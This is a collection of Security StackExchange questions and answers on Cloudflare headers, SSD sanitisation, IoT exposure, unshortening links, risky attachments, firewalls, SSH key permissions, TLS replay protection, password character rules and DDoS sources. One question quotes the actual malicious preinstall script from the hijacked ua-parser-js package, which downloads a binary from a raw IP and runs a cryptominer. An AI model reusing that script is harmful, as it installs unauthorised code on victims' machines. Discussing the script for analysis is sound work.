cf-ray: 689e1d381a951501-MAD content-length: 921473 content-type: application/pdf date: Sun, 05 Sep 2021 08:33:41 GMT etag: static/839a7f8c9ba01f8cfe9d0a41c53df20c/cloudflare-cdn-whitepaper-19Q4.797a721498.pdf expect-ct: max-age=604800, report-uri=&quot;https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct&quot; nel: {&quot;success_fraction&quot;:0,&quot;report_to&quot;:&quot;cf-nel&quot;,&quot;max_age&quot;:604800} report-to: {&quot;endpoints&quot;:[{&quot;url&quot;:&quot;https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bi6bZw6jf1FJoimuy2arirenUDiwyZX%2B%2B1Ty506xD9qMJ5UggIvZAy2h8gKogsJORkPlWdnZ12udf6CN%2BadaEF0FRKFAyZQabI6xkui0%2FrV%2BaCFsp7BmbEHnoLk0HPmJ6pMeMQ%3D%3D&quot;}],&quot;group&quot;:&quot;cf-nel&quot;,&quot;max_age&quot;:604800} server: cloudflare strict-transport-security: max-age=31536000 vary: Accept-Encoding x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block " background-color="4283586137" javascript="allow" full-frame="" pdf-viewer-update-enabled=""> Question Does this imply that cloudflare is rewriting the HTML source for PDF embeds and tracking PDF files opened through the browser PDF plugins? What are the security/privacy implications of this? Would disabling the browser PDF embed plugin reduce the amount of data collected by cloudflare? What is particularly confusing is that the <embed/> code is supposedly generated by the PDF browser plugin and NOT from the incoming response so how can this rewriting be happening specifically for cloudflare?
Cloudflare is not rewriting any HTML here. The <embed> element is generated by Google Chrome's PDF viewer, and its headers attribute simply reflects the HTTP response headers the viewer received when it fetched the file. Cloudflare controls those response headers, as it should, since it's the HTTP server responding to the request. The report-to and nel headers belong to the browser Reporting API and Network Error Logging, which are also used by security features such as Content Security Policy reporting; they are added by Cloudflare to the responses it serves and have nothing to do with PDFs specifically.
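One way to convince yourself of this is to fetch the same PDF outside of any browser and look at the raw response headers; the nel and report-to headers are already present before any PDF viewer gets involved. A minimal sketch using the third-party requests library (the URL is just the example from the question and may no longer be live):

import requests

# Ask only for the headers of the PDF; no browser or PDF plugin involved.
url = ("https://www.cloudflare.com/static/"
       "839a7f8c9ba01f8cfe9d0a41c53df20c/cloudflare-cdn-whitepaper-19Q4.pdf")
resp = requests.head(url, allow_redirects=True, timeout=10)

# These reporting-related headers come straight from the HTTP response,
# which is why Chrome's PDF viewer shows them in its <embed> element.
for name in ("nel", "report-to", "expect-ct", "server"):
    print(name, "->", resp.headers.get(name))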
{ "source": [ "https://security.stackexchange.com/questions/254940", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88855/" ] }
255,136
I held every chip (without desoldering, they were still onboard) in a lighter flame for a minute or two. They started "popping" a little if that indicates anything. Then I drove a nail into every chip (approximately through the center) with the use of a hammer. Obviously, before all of that, I did a software wipe - ATA Secure Erase using Parted Magic. If any data survived the process of Secure Erase (the drive was non-SED I am afraid, even though it was one of the newer ones), is physical destruction as described above sufficient to make any recovery attempt essentially impossible?
This approach to data destruction is theatrical and has little grounding in reasonable threat models. The most effective policy to ensure safe and responsible disposal of SSDs is: Use full-disk encryption (e.g. BitLocker, dm-crypt) for the whole lifetime of the disk, and do not write plaintext data to it. Utilise ATA Secure Erase to wipe the disk. Modern SSDs have transparent encryption at the cell level, and ATA Secure Erase simply discards the key and generates a new one. This renders the data on the underlying flash unreadable. If you are paranoid, perform a single-pass random wipe over the SSD afterwards. This is rarely justifiable in practice, and is not a safe sanitisation practice on its own due to flash wear-levelling and overprovisioning. It also causes wear on the flash cells, which is why Secure Erase exists in the first place. If you're already at the point where you're disposing of the disk, and you forgot step 1, then you're in a worse position than you could be, and this is a lesson for next time. Regarding step 3, the thing about performing random wipes on SSDs is that it is only justifiable if you're trying to gain additional protection against flawed Secure Erase implementations. However, this only makes sense if you presume that the ATA Secure Erase key cycling implementation is the only security boundary preventing an attacker from reading your data, and that an attacker will attempt to perform chip-level data recovery on your disk. Consider the following: If you're using full-disk encryption (FDE), you've already got a concrete layer of protection, so even if Secure Erase completely fails you don't need to worry about it all that much. But if you use ATA Secure Erase and you can't see the data on the drive any more, that means it did something , at least, which is good enough. Regardless of whether or not you're using FDE, if you're a regular person, attackers who have the capability to attack ATA Secure Erase implementations aren't interested in you, and do not stand to profit from using those capabilities on you, so you don't need to worry about it as long as the key is changed to literally anything else (if it wasn't, you could still see all your data). If you work in the type or organisation (government) where such an attack is relevant, you're already using FDE, and you're not getting your advice on Stack Exchange, so none of this is relevant to you and this entire answer is moot. Whichever way you look at it, ATA Secure Erase is secure enough for an average person or business even if it is not implemented in a cryptographically secure manner . For it to fail as a wiping mechanism, it either has to do absolutely nothing (which is immediately obvious, because the data will still be there), or an attacker has to reverse engineer the SSD firmware, discover the weak key generation mechanism, and perform chip-level data recovery to leverage that attack. As we already established, no such attacker exists in the average person's threat model. This is not the same as saying "everyone should just go with 'good enough' security all the time and not bother with more advanced mitigations" - that is obviously bad advice. What I mean is that any security decision you make that results in cost or waste should be justified and proportional to the security benefit. Physical destruction of storage media is rarely necessary, highly wasteful, and should be reserved for scenarios where threat modelling demonstrates a significant safety risk. 
Many governments (and businesses) have operated excessively paranoid so-called "data destruction" policies for the past decades, but have more recently re-assessed their approach due to the extreme overheads involved. The historical practices of multi-pass wipes, including utterly ludicrous 35-pass methods, are without merit on modern storage media. At best they do nothing more than wear out the storage device, and at worst they do not effectively remove sensitive information from the device (e.g. due to overprovisioning and wear levelling). Peter Gutmann himself, who wrote the paper that spawned the "Gutmann method", has this to say on the topic: In the time since this paper was published, some people have treated the 35-pass overwrite technique described in it more as a kind of voodoo incantation to banish evil spirits than the result of a technical analysis of drive encoding techniques. As a result, they advocate applying the voodoo to PRML and EPRML drives even though it will have no more effect than a simple scrubbing with random data. In fact performing the full 35-pass overwrite is pointless for any drive since it targets a blend of scenarios involving all types of (normally-used) encoding technology, which covers everything back to 30+-year-old MFM methods (if you don't understand that statement, re-read the paper). If you're using a drive which uses encoding technology X, you only need to perform the passes specific to X, and you never need to perform all 35 passes. For any modern PRML/EPRML drive, a few passes of random scrubbing is the best you can do. As the paper says, "A good scrubbing with random data will do about as well as can be expected". This was true in 1996, and is still true now. Highly disproportionate and extreme approaches to data destruction gained popularity after the DoD 5220.22-M standard was declassified, which was quickly exploited by vendors of disk wiping software to market their products as "military grade". However, people who were involved in the DoD data destruction standards later admitted that almost none of it was scientifically justified, and was instead written with the goal of appeasing military paranoia and gaining buy-in from non-technical higher ups - hence why it was named "data destruction", rather than "media sanitisation". The excesses of past policies ultimately resulted in a reduction of security posture through security fatigue and avoidance of onerous requirements. More modern standards recognise this, and take a far more scientific approach. For media sanitisation I recommend reading and following the advice in NIST SP 800-88 Rev.1 . It is very accessible and provides clear advice specific to each type of storage technology. Appendix A contains the most quickly digestible portion of the advice, but you should refer to the guidance in section 4 of the document with regard to which media sanitisation approach you take. Section 2 also provides useful background information. It is extremely difficult to justify physical destruction of storage media for any regular citizen. To be blunt, it is delusional to expect that a threat actor exists that has the technical capability to perform flash-level data recovery, the motivation and resources to utilise that capability effectively, and proportional motive to justify targeting your data specifically. Unless you're a political dissident or organised criminal, these scenarios are pure fantasy. 
If you are in one of those groups of interest, extreme approaches to data destruction are bad for operational security because they draw unnecessary attention. I recommend reading James Mickens' This World Of Ours for a wonderfully humorous take on misguided and overly convoluted security practices: In the real world, threat models are much simpler. Basically, you're either dealing with Mossad or not-Mossad. If your adversary is not-Mossad, then you'll probably be fine if you pick a good password and don't respond to emails from [email protected]. If your adversary is the Mossad, YOU'RE GONNA DIE AND THERE'S NOTHING THAT YOU CAN DO ABOUT IT. The Mossad is not intimidated by the fact that you employ https://. If the Mossad wants your data, they're going to use a drone to replace your cellphone with a piece of uranium that's shaped like a cellphone, and when you die of tumors filled with tumors, they're going to hold a press conference and say "It wasn't us" as they wear t-shirts that say "IT WAS DEFINITELY US," and then they're going to buy all of your stuff at your estate sale so that they can directly look at the photos of your vacation instead of reading your insipid emails about them. Attempted destruction of an SSD with a lighter is a perfect example of theatrical security policies that feel secure without actually doing anything useful. To destroy an SSD with heat, you generally need to heat it to a temperature far in excess of what a simple lighter can provide. Even if you heat the flash memory ICs directly, much of the heat you're applying to the package will be dissipated by the lead frame and component legs, meaning that the die temperature will be far lower than that of the flame. It is also important to understand that data retention in flash cells at high temperatures is not best modelled by a "failure point". The behaviour is better modelled as a degradation factor. Flash cells do not have an infinite storage lifetime while unpowered - over time, the cells will start to lose their state. The period between the last powered operation and the time at which the cells lose enough of their state to result in data corruption is known as the data retention rate. For most consumer SSDs, the retention rate is usually around a year, when the drive is stored at the recommended temperature range. The degradation factor is the measure of how much faster the degradation occurs at a particular temperature. In the recommended storage temperature range, the degradation factor is close to 1. A degradation factor of 2 means that the data degrades in half the time. As the temperature rises, the degradation factor increases. The exact degradation factor at a given temperature is device-specific, but for NAND flash the curve rises steeply with temperature (graph omitted here; source: Achieving Extensive Data Retention in High-Temperature Environments). As the die temperature hits 80°C, the degradation factor exceeds 150. If the storage device under test has a standard retention rate of one year, a degradation factor of 150 reduces this to around 60 hours. If we take a crude linear extrapolation of that curve beyond the 60°C point, we get a gradient of around 6/°C. If we presume that your lighter manages to get the die temperature to 500°C, this would produce a DF of around 2100. Dividing one year by 2100 gives us 4.2 hours, which is a rough guesstimate of how long you'd have to hold the flash chip over your lighter before it degraded to a significant level.
If we're a bit more charitable and assume that your lighter can heat the chip to 1000°C, that brings the degradation factor up to 5850, which still means an hour and a half of heating. Per flash chip. To get an equivalent degradation to one year of being powered off, which does not mean complete loss. This is obviously not practical. If we go all the way up to high-heat butane lighters, and assume that none of the heat is dissipated, we get to about 1900°C in a tightly focused flame - far greater than that of a blowtorch. The DF stops being relevant here because the copper will melt, but if it was still relevant you'd need to heat it for around 46 minutes. Still, this does rather prove the point that it takes a whole lot of heat and/or time to make this kind of destruction approach useful. Putting a nail through the chips is certainly effective, but at a cost that makes absolutely no sense. If your SSD has failed to the point of being non-functional, and it still contains sensitive data (especially if you forgot to use FDE), sure, subject it to whatever physical destruction approach you like. Realistically, if you throw it away, nobody is going to try to read it by doing anything more than plugging it into a computer. There's no harm done in smashing up an already broken drive, other than the potential for injuring yourself in the process. It might even be cathartic. But if you physically destroy a functioning drive, you're just generating e-waste and costing yourself money for no tangible benefit.
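For anyone who wants to play with the numbers, here is a small sketch of the back-of-the-envelope arithmetic above. The one-year retention figure, the roughly 150x factor at 80°C and the ~6 per °C slope are eyeballed from the cited source, so this only reproduces the order of magnitude of the figures in the answer, not exact values:

# Crude estimate of how long sustained heating of a flash die would take to
# consume one year's worth of data retention, using the rough numbers above.
RETENTION_HOURS = 365.25 * 24      # assumed unpowered retention at normal temps
DF_AT_80C = 150.0                  # degradation factor around 80 °C (eyeballed)
SLOPE_PER_C = 6.0                  # assumed slope of the curve above that point

def hours_to_degrade(die_temp_c: float) -> float:
    """Hours of sustained heating to use up one retention period (>= 80 °C only)."""
    degradation_factor = DF_AT_80C + (die_temp_c - 80.0) * SLOPE_PER_C
    return RETENTION_HOURS / degradation_factor

for temp in (80, 500, 1000, 1900):
    print(f"{temp:>5} °C -> roughly {hours_to_degrade(temp):6.1f} hours")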
{ "source": [ "https://security.stackexchange.com/questions/255136", "https://security.stackexchange.com", "https://security.stackexchange.com/users/267030/" ] }
255,378
I am connecting an Arduino Uno to the internet via Ethernet (using the Ethernet Shield v2) and querying NTP time. Making requests to an NTP server is the only internet-related thing it does. You can use the Ethernet shield as an SD card to host data, but I WILL NOT be doing that. It will only be querying NTP. I'm worried this IoT device will become a security target for my network. What attacks is it vulnerable to? And how do I secure such a low-spec device? Note: I am not worried about physical attacks; the device will be locked away.
Unless your code has a memory corruption vulnerability in its handling of NTP, or there's a similar vulnerability in some part of the networking stack, there's basically no attack surface there. Furthermore, an Arduino Uno uses an Atmel ATmega328P, which does not support execution of code from RAM. The code executes from the MCU program flash, which is not writable at runtime. This makes it highly implausible that anyone could gain either volatile or non-volatile persistence on it.
{ "source": [ "https://security.stackexchange.com/questions/255378", "https://security.stackexchange.com", "https://security.stackexchange.com/users/267399/" ] }
255,448
There are a lot of different URL shorteners out there, like Bitly or TinyURL . Besides their main purpose of shortening a link, they also: obfuscate the actual URL collect statistics about the usage of the short link From the obfuscation, at least two risks arise: The actual URL might have been obfuscated to hide its suspicious domain. While people might click on a link of a well-known link shortening provider, they probably would not access a URL that looks like paypal.secure-sfksjdfs.com , AMAZ0N.COM or ajhssafskjh.ru . The actual URL might have been obfuscated to hide the query string that might contain identifying data. This could be personal data like in this URL: https://completelyimaginary.url/[email protected] Or an ID that might be relatable to you (e. g. in case it was only sent to you): https://completelyimaginary.url/index.html?id=T3X3MAPNEIYAKAZPHNC4 Or it may contain information that has been obfuscated even more (Base64): https://completelyimaginary.url/index.html?url=aHR0cHM6Ly9iaXQubHkvM2t3UVYyMA-- To avoid these risks, can I safely preview a short link to be able to inspect the actual URL before opening it? In other words, can I get the target URL without actually accessing it?
Most of the link shortening providers also offer a possibility to preview the URL a short link will redirect to. Most times, it is sufficient to modify a little detail of the short link: Bitly Add a + sign to the short link ( source ): https://bit.ly/3kwQV20 -> https://bit.ly/3kwQV20+ Cuttly Add a @ symbol to the short link: https://cutt.ly/YEh65VC -> https://cutt.ly/YEh65VC@ is.gd Add a - (hyphen) sign to the short link: https://is.gd/vzC7mi -> https://is.gd/vzC7mi- TinyURL Add a + sign to the short link: https://tinyurl.com/3yw559cj -> https://tinyurl.com/3yw559cj+ Or add preview as a subdomain to the short link: https://tinyurl.com/3yw559cj -> https://preview.tinyurl.com/3yw559cj If the link shortening provider does not offer a way to preview the URL, you can also use the following tools to get the URL to which a short link will redirect to. They all have in common that they will only download the headers of the short link and will not follow the URL the short link points to. Be aware that your access may be logged by the link shortening provider and it also may be added to the statistics of the short link usage. curl curl does not follow redirects by default. The option -I tells it to only download the headers: curl -sI https://bit.ly/3kwQV20 | grep -i Location Output: location: https://security.stackexchange.com/q/255448/230952 wget Alternative with wget : wget -S --spider --max-redirect=0 https://bit.ly/3kwQV20 2>&1 | grep -i Location wget will follow redirections by default, so you have to limit it by --max-redirect=0 . Furthermore, it will write to the error stream, so you have to redirect that to be able to grep it. The output will be: Location: https://security.stackexchange.com/q/255448/230952 If the target looks like another redirection, then you can re-run the command, changing --max-redirect=0 to --max-redirect=1 . This makes wget stop before the second redirect, etc. PowerShell Alternative with Invoke-WebRequest : (Invoke-WebRequest -Uri https://bit.ly/3kwQV20 -Method Head -MaximumRedirection 0 -ErrorAction SilentlyContinue).Headers.Location Or more abbreviated: (iwr https://bit.ly/3kwQV20 -Me H -Ma 0 -EA Si).Headers.Location Output: https://security.stackexchange.com/q/255448/230952 URL Checkers If you don't have access to the above tools, you can also use online services to do it for you. Be aware that you probably don't know how exactly they work. So they might even access the target URL, which might be undesirable in some threat models. Example websites: https://getlinkinfo.com/ https://unshorten.it/ https://unshorten.me/ http://urlxray.com/
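If you prefer doing this from Python instead of the shell, the same idea works with the third-party requests library: send a single request without following redirects and read the Location header. As with the commands above, the shortening service may still log and count the lookup:

import requests

def unshorten_one_hop(short_url: str) -> str:
    """Return the Location header of the first redirect without following it."""
    resp = requests.head(short_url, allow_redirects=False, timeout=10)
    return resp.headers.get("Location", "")

print(unshorten_one_hop("https://bit.ly/3kwQV20"))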
{ "source": [ "https://security.stackexchange.com/questions/255448", "https://security.stackexchange.com", "https://security.stackexchange.com/users/230952/" ] }
255,717
Let's assume we have an example machine connected to the internet. This machine is typically a client, and it has no services like ssh running on it. Does this kind of machine need a firewall to restrict incoming connections? On the one hand, there are no services that would accept the network packets, so there's no threat to the system, but is it really safe to accept such packets without DROP'ing them? Is there any possibility that the Linux kernel would misinterpret such packets and behave in an unpredictable way?
This is close to asking whether a shut-down computer needs updates. The answer is no, if and only if you are sure that it will always stay off. Your question should receive a similar answer: if you are sure that no listening services are active and that none ever will be, you do not need to block incoming connections. But in the real world, having no network services at all is hard to achieve. At the very least, X Window is a network-oriented protocol, and many services are installed and active by default on a newly installed system. Furthermore, a firewall should not be limited to blocking incoming connections, but should also control which outgoing connections are allowed. Doing so can prevent a user from simply downloading or receiving by mail (through legitimate outgoing connections...) an infected application that later tries to leak private information or, even worse, opens a tunnel giving the attacker local access. The stricter the outgoing filter, the harder it will be for the attacker.
{ "source": [ "https://security.stackexchange.com/questions/255717", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34482/" ] }
255,804
Corporate security training keeps saying "download a file from the web or an email attachment and open it and you might become infected". I know this used to be the case on old Windows machines in the 90s, but is it still the case on any computer? Obviously, if you open a shell script or an executable file or app, that might be a problem, but at least on Macs, Apple has that warning popup. Are they basically suggesting that there might be some exploitable holes in the software we use "regularly" (like Excel or Apple Numbers, or Apple Preview for PDFs), and that attackers can exploit those loopholes to install something somehow? The loophole would be unknown to the company providing the software but known to the attacker? That's the only way I can see them getting access to your computer; is there another way? I would assume in today's world there is 0% chance of getting "infected" by opening a PDF or .xlsx or .doc file on a Mac, but is that not true? As a bonus question, if it is still true today that opening a "normal" file might install malware, what is the recommended approach to avoiding this, assuming you want to be able to open these files (and assuming you've checked they're from reputable sources, etc.)?
Simple Instructions Over "Correct" Instructions You may be a security expert, or at least a very knowledgeable person when it comes to computers, but the vast majority of people - even those who work with computers on a daily basis - are not. I know entirely too many people who think computers are basically a box full of plastic and magic. Explaining to these people which file extensions are more likely to be dangerous and which ones are less likely to be dangerous will probably lead to a lot of confusion. I assure you that a significant number of people who work in an office can't tell the difference between a PDF document and a Word document, so explaining what the risk of each is is not very productive. As such, broad statements like "Don't open files from e-mail attachments unless they are from a trusted source" are still useful, even if they are not 100% technically correct. Which Files Are Dangerous? Basically, all of them. Always presume that a file is dangerous, even if you can't imagine how it could possibly be. Here is a list of some common file types and how they could be dangerous: PDF Files: PDF is a complex file format and, as of the time of this writing, over 1500 exploits related to PDFs exist in the CVE database. Office Documents: One of the most prominent attacks in Office documents is macros. The general idea is that you send someone an Office document, claim that it contains some important information, then create the document in such a way that it only displays the supposed information if macros are enabled. For example, you can steal NTLM hashes like that. Spreadsheets: Also related to Office applications, you can create a malicious spreadsheet which executes OS commands when opened. This attack is called CSV Injection. ZIP Files: ZIP files can be quite dangerous. For one, they can cause Denial-of-Service attacks through something like a zip bomb or place arbitrary files on a machine through zip slipping. While there are indeed measures to mitigate some of these risks, oftentimes these include asking the user if they want to do something risky. 9 times out of 5, they will say yes. Not because they understand that the action they're about to take is risky, but because their computer asks them so often if they want to do something and they're used to playing the little game where they have to find the button that makes the computer do what they want to do. How to Mitigate This Risk? There is no perfect one-size-fits-all solution. If there were, we wouldn't have to worry about malware. It depends largely on the technical expertise of who you are talking to. When talking to an expert, I would say "Trust your gut!". Your instinct is the most advanced part of the brain, optimized over millions of years through the most brutal optimization process in existence - you would do well to use it. If you have a bad feeling about a file, don't open it. And if you have to, do it in a VM on an airgapped machine, which you completely scrub afterwards. When talking to the average user, I would repeat the same handful of security tips you have heard a million times. Don't open files from untrustworthy sources, have an up-to-date anti-virus, etc. etc. You've heard it a million times before.
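To make one of the points above concrete, here is a minimal sketch of the kind of check an extraction routine needs in order to avoid zip slip. The file names are placeholders, and real code would also need to worry about archive size limits (zip bombs) and symlinks:

import os
import zipfile

def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract a ZIP archive, refusing entries that would escape dest_dir."""
    dest_dir = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive_path) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(dest_dir, name))
            # A malicious entry such as "../../etc/cron.d/evil" resolves to a
            # path outside the destination directory; refuse the whole archive.
            if not target.startswith(dest_dir + os.sep):
                raise ValueError(f"blocked zip-slip attempt: {name!r}")
        zf.extractall(dest_dir)

# Hypothetical usage:
# safe_extract("attachment.zip", "/tmp/extracted")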
{ "source": [ "https://security.stackexchange.com/questions/255804", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268102/" ] }
256,116
Just finished a simple local file inclusion challenge, and I wanted to make sure I understood the issues around permissions and SSH keys correctly: We set private SSH keys to 600 so only the user who owns them can read them. Say we had 777 instead of 600: that means any user (so, for example, www-data) can read them and thus can obtain the private key. What I don't understand is how or why, when trying to connect over SSH to another host, said host knows that we have such permissions. (Is it the server or the local SSH process that warns us?) And what is the minimum accepted to connect, i.e. the least restrictive permissions?
It is not about the SSH server knowing about the file permissions of the client. The scenario is instead having multiple users on the same computer or on the same shared network file system. Since the private key should identify a specific user it is necessary that other users on the same shared resource cannot read or manipulate the private key, i.e. the minimum permissions should allow read and write access only for the user itself, i.e. -rw------- which translates to (octal) 0600.
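To make this concrete: it is the local ssh client, not the server, that inspects the key file's mode bits and refuses to use a key that is readable by group or others. You can reproduce essentially the same check in a few lines of Python; the key path below is just an example:

import os
import stat

def key_is_too_open(path: str) -> bool:
    """Mimic the client-side check: any group/other access makes the key unsafe."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return bool(mode & (stat.S_IRWXG | stat.S_IRWXO))

# Hypothetical usage:
# if key_is_too_open(os.path.expanduser("~/.ssh/id_ed25519")):
#     print("Permissions too open - tighten to 0600 (read/write for the owner only)")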
{ "source": [ "https://security.stackexchange.com/questions/256116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/253360/" ] }
256,126
(shown in step 1): Is the initial process in public key encryption, where the public key is transferred across the network, done in plaintext? It seems like it must be, which essentially means that no matter whether a victim is using HTTPS or a VPN on a public network, if the initial process is done in plain text, then a middleman who has full access to the network traffic can essentially just intercept that initial public key transfer, steal the key, and effectively intercept the rest of the victim's "secure" transmission in their "secure" internet session? So if I am right, public networks are only secure as long as the device obtaining the public key was there before the attacker was?
{ "source": [ "https://security.stackexchange.com/questions/256126", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268609/" ] }
256,132
For context; I have a web application that allows users to upload a PDF file from which the web app extracts certain information by parsing it. The app then sends this information to another server for further processing. The web app is based on Python (Django & FastAPI) and runs on a Linux-based operating system inside a Docker container (which has root privileges). The PDF file is not stored, it is received at an endpoint as a regular HTTP request with the file contained in the form data (multipart/form-data); this file is then converted to HTML and parsed (the file is never stored on the server, only handled in-memory). The resulting data are sent to another server for storage in an SQL database. My questions are as follows: Is parsing the file in an interpreted language such as Python considered to be 'executing' it? Does handling this file in this manner pose any risk to the server if the file contains malware?
{ "source": [ "https://security.stackexchange.com/questions/256132", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268612/" ] }
256,373
Recently (just now) the npm package ua-parser-js was found to be hijacked. The hijack installs a crypto miner on preinstall but I noticed the following passage in the preinstall script: IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ') if [ -z "$IP" ] then var=$(pgrep jsextension) if [ -z "$var" ] then curl http://159.148.186.228/download/jsextension -o jsextension if [ ! -f jsextension ] then wget http://159.148.186.228/download/jsextension -O jsextension fi chmod +x jsextension ./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null & fi fi My question is why does the script check if the server is in Russia, Ukraine, Belarus or Kazakhstan before downloading the payload? Is there something special about these countries?
Certain governments tend to ignore hacking/cybercrime carried out by their own citizens, as long as they only target people from other countries. Brian Krebs talks about this in an article earlier this year: In Russia, for example, authorities there generally will not initiate a cybercrime investigation against one of their own unless a company or individual within the country’s borders files an official complaint as a victim. Ensuring that no affiliates can produce victims in their own countries is the easiest way for these criminals to stay off the radar of domestic law enforcement agencies. There have been various malware samples in the past that did this by looking at the keyboard layouts that were installed (to the point that some people were recommending installing a Cyrillic layout to protect yourself against malware). What you're seeing is a different version of the same thing.
{ "source": [ "https://security.stackexchange.com/questions/256373", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268974/" ] }
256,390
When sniffing network traffic, one can see an HTTPS packet and all its (encrypted) data. I am wondering what would happen if this packet is copied and then re-sent. Is there a protocol at some layer that prevents the same packet being used twice? (with something such as a timestamp maybe) If not, how should the server side defend against it?
There are multiple mechanisms to detect duplicates. At the TCP level there is the sequence number sent within each TCP packet, which makes it possible to detect whether a packet was received twice, or more generally whether it overlaps with already received data. This is not actually a security feature; it exists to detect packet reordering, duplication and loss, and in this way provide a reliable transport layer on top of an unreliable network layer. If such a duplicate gets detected it will simply be discarded. At the TLS level no sequence numbers are explicitly sent on the wire, but sequence numbers are still maintained inside the TLS state of each peer and are included in the computation of the payload protection. Thus TLS has replay protection by design - see TLS sequence number for more. Since a successfully replayed packet essentially means that an attacker was able to actively fiddle with the underlying reliable TCP connection, this connection will usually be treated as compromised and abandoned. Additionally, each new TLS session results in a different encryption key, i.e. the server would not be able to decrypt an HTTP request sniffed from a different TLS session in the first place. Thanks to user253751 for pointing this out in a comment.
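To illustrate the TLS-side idea without reproducing the actual TLS record protection (which is more involved), here is a minimal sketch using the third-party cryptography package: the record sequence number is mixed into the AEAD nonce, so a record that is replayed or arrives at the wrong position fails authentication. This is only similar in spirit to what TLS 1.3 does, not a faithful implementation:

import struct
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305

key = ChaCha20Poly1305.generate_key()
aead = ChaCha20Poly1305(key)
iv = b"\x00" * 12   # toy static IV; real TLS derives this from the handshake

def nonce_for(seq: int) -> bytes:
    # XOR the 64-bit record sequence number into the IV.
    return iv[:4] + bytes(a ^ b for a, b in zip(iv[4:], struct.pack(">Q", seq)))

record = aead.encrypt(nonce_for(0), b"GET / HTTP/1.1", b"")

print(aead.decrypt(nonce_for(0), record, b""))    # expected at seq 0: accepted
try:
    aead.decrypt(nonce_for(1), record, b"")        # replayed at seq 1: rejected
except InvalidTag:
    print("replayed record rejected")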
{ "source": [ "https://security.stackexchange.com/questions/256390", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269005/" ] }
256,395
DocuSign requires that your password "must not contain the characters <, > or spaces." Is this not an odd requirement? Despite being a leader in online document signing, my gut tells me there's something odd under-the-hood.
Generously? Because that restriction was created by somebody with no understanding of web security. (Less-generous possible explanations are up to the reader.) The typical danger in such characters is if they're ever output into the response, in which case they could lead to XSS. However, that shouldn't ever be a problem, for so many reasons. Foremost, passwords in general should literally never be in responses. There's just no situation where a user-specified password should ever be present in any content returned from a server. It shouldn't even be possible to do this; the server should not store the password (even in memory) for any longer than is needed to verify its quality and then hash it. If the quality check (which can be done every time, or only at password creation/rotation) fails, you still should immediately forget what it was (and definitely shouldn't return it, see #1). Passwords should only ever be persisted in the form of digests from salted and expensive hashing functions. Hash digests won't contain those characters (under any likely encoding), shouldn't ever be put in responses either, and having those characters in the input is irrelevant to the digest anyhow . Even if, for some security-forsaken reason, you wanted to return a password in a response, you should apply standard anti-XSS measures to it, like output encoding. This applies to all user input that ends up in responses. You could also return the value in an API response and have client-side code inject it as text (this is what e.g. React does), which is also safe. XSS is generally only relevant if an attacker can force somebody else to visit the page. Since a login page isn't going to reflect any other user's stored data back, and certainly shouldn't do anything with taking a password from the URL and putting it in the DOM client-side, the only approach that would make sense is reflected XSS. It's easy (though admittedly uncommon) to prevent third parties from attempting to submit a password on behalf of another browser; that's what anti-CSRF methods do (login CSRF is generally not treated as a big risk, but in the specific case of DocuSign it actually might be, if somebody uploads a confidential form to what they think is their account but actually isn't, so hopefully they are protecting against that). There are other mitigations against XSS, such as Content Security Policy. With nearly all browsing activity now on browsers that support it, and with login pages being security-critical and generally lacking third-party content, they're an easy and obvious place to get a lot of protection from CSP. Beyond all the reasons why you shouldn't need to have such restrictions, they look extremely sketchy. They imply that passwords might ever end up in responses and/or that they're being stored in plain text (in the database, or in logs which is arguably even worse). As a practical matter, preventing those few characters doesn't meaningfully impact the security of available passwords (that is, nobody is likely to have a password that would be safe if only it could contain a < , but isn't otherwise), nor does it significantly simplify brute-forcing attacks. However, it still reflects poorly on the security awareness of the site. EDIT: As pointed out in the comments, it's possible the problem is instead that the unhashed passwords are - or were at some point - being put into another context that cares about angle brackets, such as an XML document (stored or transmitted). 
Obviously this breaks several of the guidelines above, such as doing anything with the password other than validating, hashing, and forgetting it, but also it's easily addressed; as with reflecting the password into HTML, if it's put into XML, it should be output encoded first.
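To make the first few points concrete, here is a minimal sketch of the "validate, hash, forget" flow using only the Python standard library. With a scheme like this, characters such as <, > or spaces are irrelevant, because only a random salt and a fixed-length digest are ever stored, neither of which contains the original characters. The scrypt parameters are illustrative, not a tuning recommendation:

import hashlib
import hmac
import os

def hash_password(password: str) -> tuple:
    """Return (salt, digest); the plaintext is not kept or logged anywhere."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=2**14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)

salt, digest = hash_password("any <characters> at all, including spaces")
print(verify_password("any <characters> at all, including spaces", salt, digest))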
{ "source": [ "https://security.stackexchange.com/questions/256395", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269016/" ] }
256,457
While analysing a DDoS attack on my site using CloudFlare console, I've noticed that many attack requests come from AS139190 GOOGLE-AS-AP Google Asia Pacific Pte. Ltd. with Empty user agent . I'm wondering how Google is exploited to attack my site?
Most likely someone using Google's Cloud Platform (GCP) . They have a page here where you can report abuse on their platform.
{ "source": [ "https://security.stackexchange.com/questions/256457", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269106/" ] }
256,524
